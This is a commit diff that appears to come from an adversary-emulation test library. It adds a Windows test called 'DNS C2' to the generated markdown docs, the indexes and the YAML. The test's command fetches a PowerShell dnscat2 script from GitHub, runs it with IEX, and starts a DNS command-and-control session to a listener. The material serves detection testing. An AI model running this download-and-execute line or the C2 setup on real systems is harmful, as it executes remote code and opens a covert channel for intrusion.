Generate docs from job=validate_atomics_generate_docs branch=master

2020-02-06 16:00:58 +00:00
parent c9bf800a29
commit 19560b02c8
4 changed files with 58 additions and 0 deletions
@@ -18,6 +18,8 @@ For connections that occur internally within an enclave (such as those between a

 - [Atomic Test #6 - DNS Long Domain Query](#atomic-test-6---dns-long-domain-query)

+- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
+

 <br/>

@@ -195,4 +197,34 @@ Set-Location $PathToAtomicsFolder



+<br/>
+<br/>
+
+## Atomic Test #7 - DNS C2
+This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+The following blogs have more information.
+https://github.com/iagox86/dnscat2
+https://github.com/lukebaggett/dnscat2-powershell
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com|
+| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+```
+IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
+```
+
+
+
+
+
+
 <br/>
@@ -983,6 +983,7 @@
  - Atomic Test #4: DNS Large Query Volume [windows]
  - Atomic Test #5: DNS Regular Beaconing [windows]
  - Atomic Test #6: DNS Long Domain Query [windows]
+  - Atomic Test #7: DNS C2 [windows]
 - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
  - Atomic Test #1: OpenSSL C2 [windows]
 - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)
@@ -27955,6 +27955,30 @@ command-and-control:
        command: |
          Set-Location $PathToAtomicsFolder
          .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+    - name: DNS C2
+      description: |
+        This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
+        The following blogs have more information.
+        https://github.com/iagox86/dnscat2
+        https://github.com/lukebaggett/dnscat2-powershell
+      supported_platforms:
+      - windows
+      input_arguments:
+        domain:
+          description: Domain Name configured to use DNS Server where your C2 listener
+            is running
+          type: string
+          default: example.com
+        server_ip:
+          description: IP address of DNS server where your C2 listener is running
+          type: string
+          default: 127.0.0.1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |-
+          IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
+          Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
  T1032:
    technique:
      x_mitre_data_sources:
@@ -730,6 +730,7 @@
  - Atomic Test #4: DNS Large Query Volume [windows]
  - Atomic Test #5: DNS Regular Beaconing [windows]
  - Atomic Test #6: DNS Long Domain Query [windows]
+  - Atomic Test #7: DNS C2 [windows]
 - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md)
  - Atomic Test #1: OpenSSL C2 [windows]
 - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)